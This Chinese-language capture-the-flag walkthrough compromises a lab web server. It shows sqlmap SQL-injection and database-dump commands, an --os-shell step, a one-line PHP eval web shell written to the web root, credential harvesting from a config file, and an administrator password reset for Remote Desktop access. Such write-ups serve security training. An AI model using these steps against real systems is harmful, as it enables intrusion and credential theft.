CTF主機(jī)滲透的方法是什么

這篇文章主要介紹了CTF主機(jī)滲透的方法是什么的相關(guān)知識(shí)，內(nèi)容詳細(xì)易懂，操作簡(jiǎn)單快捷，具有一定借鑒價(jià)值，相信大家閱讀完這篇CTF主機(jī)滲透的方法是什么文章都會(huì)有所收獲，下面我們一起來(lái)看看吧。

第一步：首先打開(kāi)連接地址: http://202.0.0.207

第二步：尋找漏洞點(diǎn)，點(diǎn)擊頁(yè)面的時(shí)候，我們看到是PHP的網(wǎng)站，以及url中的參數(shù)名為cid，那我們可以使用sql注入試試，看是否存在sql注入漏洞

我們使用手工判斷方法：

http://202.0.0.207/product.php?cid=3’， 頁(yè)面異常

http://202.0.0.207/product.php?cid=3 and 1=1，正常

http://202.0.0.207/product.php?cid=3 and 1=2，異常

從而判斷此處一定存在sql注入漏洞，且參數(shù)類(lèi)型為整型。

這里我們可以使用盲注來(lái)手工注入。因?yàn)閟qlmap也支持盲注類(lèi)型，所有為了節(jié)約時(shí)間我們就使用sqlmap來(lái)脫庫(kù)吧！

第二步：使用sqlmap來(lái)脫庫(kù)

sqlmap -u http://202.0.0.207/product.php?cid=3

此參數(shù)爆出時(shí)間盲注和聯(lián)合注入攻擊可以實(shí)現(xiàn)。

接下來(lái)我們直接開(kāi)始跑庫(kù)吧

sqlmap -u http://202.0.0.207/product.php?cid=3 –dbs

我們選擇510cms數(shù)據(jù)庫(kù)來(lái)爆吧

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms –tables

再來(lái)爆510_admin試試

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin --columns

接下來(lái)爆數(shù)據(jù)

sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin -C id,mid,name,passwd,remark –dump

然后我們想要admin用戶(hù)的密碼：8dbdf8221fcf4bd6ac5a48317baa948c，在線(xiàn)MD5解密后得到密碼為adminlwphp

第三步：我們接下來(lái)就去找后臺(tái)登錄頁(yè)面了

這里我使用御劍后臺(tái)掃描器 

首先我們還是看登錄頁(yè)面的源碼，看是不是有flag，果然如此，在這里拿到一個(gè)flag3{d3eac3a68b7d3863cc7bd45ba948195d}

接下來(lái)我們使用爆庫(kù)出來(lái)的管理員賬戶(hù)和密碼登錄：admin/ adminlwphp，登錄成功

第四步：胡亂搗騰

進(jìn)入后臺(tái)后，現(xiàn)在也只有到處去收集有用信息，看下有沒(méi)有直接拿flag的地方了。一不小心，突然看到了網(wǎng)站絕對(duì)路徑C:/www/,那根據(jù)前面爆出的sql注入漏洞，我們能不能拿到cmdshell呢？我們接下來(lái)嘗試一下

sqlmap -u http://202.0.0.207/product.php?cid=3 --os-shell

果然拿到了cmdshell，真XX是一個(gè)驚喜，那么我們接下就看下現(xiàn)在擁有的系統(tǒng)權(quán)限是什么

第五步：一句話(huà)木馬上傳及利用

接下來(lái)就直接寫(xiě)入一句話(huà)木馬了

echo ^<?php @eval($_POST[pass]);?^>>C:/WWW/shell.php

接下來(lái)我們上菜刀工具

連接成功

第六步：胡亂搗騰

下面看到這么多頁(yè)面心頭就開(kāi)始發(fā)慌，又得漫山遍野的去收集flag了，

在網(wǎng)站根目錄發(fā)現(xiàn)flag.php文件，發(fā)現(xiàn)flag1=flag1{6ab7c0c46b171d04f1cab922c2f9f017}

花了10多分鐘，再也沒(méi)有找到flag，那只有想其他的辦法了。在configs中找到config.php，這個(gè)是數(shù)據(jù)庫(kù)的配置文件，我們得到了數(shù)據(jù)庫(kù)連接的賬戶(hù)root密碼為windpasssql

我們使用菜刀對(duì)數(shù)據(jù)庫(kù)進(jìn)行連接

提交后，連接成功

繼續(xù)看這里有沒(méi)有flag，又拿到一個(gè)flag=flag2{981c05134c56092b83b3e9c9b4116ac1}

我們使用菜刀工具進(jìn)入虛擬終端，看下目前的權(quán)限是什么，需要提權(quán)不？結(jié)果發(fā)現(xiàn)是system權(quán)限，

執(zhí)行命令netstat -an查看3389端口已經(jīng)開(kāi)啟

et user administrator godun.f

修改管理員密碼為godun.f，

然后遠(yuǎn)程桌面登錄遠(yuǎn)程主機(jī)

拿到flag=flag4{e97950cb2dea110c53cb599abc826268}

拿到了4個(gè)flag，還有一個(gè)不知道藏在哪里，我們還得繼續(xù)找，找了半天，最后在，C盤(pán)的根目錄下找到了flag5{c3bc1e7b8325d75816e1ca8ae5ae72ad}

最后，到此為止，5個(gè)flag全部找出來(lái)了，接下來(lái)我們把5個(gè)flag放入答題框

關(guān)于“CTF主機(jī)滲透的方法是什么”這篇文章的內(nèi)容就介紹到這里，感謝各位的閱讀！相信大家對(duì)“CTF主機(jī)滲透的方法是什么”知識(shí)都有一定的了解，大家如果還想學(xué)習(xí)更多知識(shí)，歡迎關(guān)注億速云行業(yè)資訊頻道。